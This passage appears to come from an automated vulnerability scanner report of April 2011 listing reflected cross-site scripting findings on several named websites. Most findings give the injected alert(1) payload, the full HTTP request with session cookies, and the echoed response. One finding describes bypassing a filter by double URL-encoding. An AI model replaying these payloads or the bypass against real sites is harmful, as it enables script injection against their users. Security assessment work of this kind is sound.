The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ef4"><script>alert(1)</script>42d3138b490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc1"-alert(1)-"492761e65ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/ HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17b9f"-alert(1)-"154cd4038ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/ HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... vascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80a5"-alert(1)-"a7f7679dbe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2795"-alert(1)-"3186fbadb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... vascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5413"-alert(1)-"2568c09e6eb was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb HTTP/1.1 Host: www.salsalabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f48"-alert(1)-"9e6d2606619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /95f48"-alert(1)-"9e6d2606619/hq/css/custom.css HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: https://www.salsalabs.com/dia/hq/sso/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ecf"-alert(1)-"bf4e2d5f0b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/ HTTP/1.1 Host: www.salsalabs.com Connection: keep-alive Referer: http://www.salsalabs.com/o/8001/p/salsa/website/labs/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... text/javascript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89371"-alert(1)-"db10ed2c3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico89371"-alert(1)-"db10ed2c3c4 HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<title>Salsa Commons | Empowering the platform for change</title> <meta nam ...[SNIP]... ript"> $(function() { function showLogin(redirect) { var newDialog = $("#loginDialog").clone();
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed2be"%3balert(1)//3e04ad354f9 was submitted in the c parameter. This input was echoed as ed2be";alert(1)//3e04ad354f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41b40"%3balert(1)//971f44b87cd was submitted in the c parameter. This input was echoed as 41b40";alert(1)//971f44b87cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 873a5%253cscript%253ealert%25281%2529%253c%252fscript%253ef27de3394b7 was submitted in the REST URL parameter 1. This input was echoed as 873a5<script>alert(1)</script>f27de3394b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 404 File Not Found
Date: Fri, 22 Apr 2011 15:22:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592
<html> <head> <title>404 File Not Found</title> </head> <body> <H1>404 File Not Found</H1> <br><br><br><br> Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico873a5<script>alert(1)</script>f27de3394b7<br> ...[SNIP]...
3.185. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swiftpage1.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbbe9<script>alert(1)</script>e263f3ff8a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload ce345<script>alert(1)</script>25f446fe2ba was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/scripts/sifr_init_js.aspx?path=/resources/ce345<script>alert(1)</script>25f446fe2ba HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 9470d<script>alert(1)</script>3c4a6bfe622 was submitted in the path parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/ubi_stylesheet_png.aspx?path=/resources/9470d<script>alert(1)</script>3c4a6bfe622 HTTP/1.1
Host: www.ubi.com
Proxy-Connection: keep-alive
Referer: http://www.ubi.com/US/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ad0whkvvbjyq5l552vkp0wqm
This file supports the use of PNG files. Since IE6 requires PNG's to be absolutely specified, this file will programatically add the correct information to the ...[SNIP]... */
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6a87"%3balert(1)//2fec8277eb7 was submitted in the Referer HTTP header. This input was echoed as f6a87";alert(1)//2fec8277eb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ebfcd<script>alert(1)</script>23b35df6fea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload e05ad<script>alert(1)</script>be5d4d0f272 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e65'><script>alert(1)</script>f275fdc8f15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=a5e65'><script>alert(1)</script>f275fdc8f15'> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aecea<script>alert(1)</script>73d9521b5ce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dia/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>73d9521b5ce'>http://www.google.com/search?hl=en&q=aecea<script>alert(1)</script>73d9521b5ce</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 7db98<script>alert(1)</script>5eea73835cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>5eea73835cc'>http://www.google.com/search?hl=en&q=7db98<script>alert(1)</script>5eea73835cc</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 889b4'><script>alert(1)</script>d9052bed70a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /favicon.ico HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990
Referer: http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=889b4'><script>alert(1)</script>d9052bed70a'> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload db55a<script>alert(1)</script>474f814857b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... </script>474f814857b'>http://www.google.com/search?hl=en&q=db55a<script>alert(1)</script>474f814857b</a> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3385'><script>alert(1)</script>af1a8e2a429 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<div id="404container" class="error404"> <h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>
<p>It looks like you've requested a page that is cu ...[SNIP]... <a href='http://www.google.com/search?hl=en&q=d3385'><script>alert(1)</script>af1a8e2a429'> ...[SNIP]...
3.197. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.force.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ebaef<script>alert(1)</script>ea50eb48de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1">http://www.salesforce.com/platform?ebaef<script>alert(1)</script>ea50eb48de3=1</a>
3.198. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.force.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e1f"><script>alert(1)</script>ca65c1d65e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1">http://www.salesforce.com/platform?e9e1f"><script>alert(1)</script>ca65c1d65e=1</a>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e75d<script>alert(1)</script>165d6b47824 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824
Content-Type: text/html
Content-Length: 262
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824">http://mrnumber.com/favicon.ico7e75d<script>alert(1)</script>165d6b47824</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7e06"><script>alert(1)</script>1c75dad300f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found
Location: http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f
Content-Type: text/html
Content-Length: 266
<html><head><title>Redirect</title></head><body><h1>Redirect</h1><p>You should go to <a href="http://mrnumber.com/favicon.icoc7e06"><script>alert(1)</script>1c75dad300f">http://mrnumber.com/favicon.ic ...[SNIP]...
3.201. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.mrnumber.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bd8"><script>alert(1)</script>35e978e613 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 302 Found
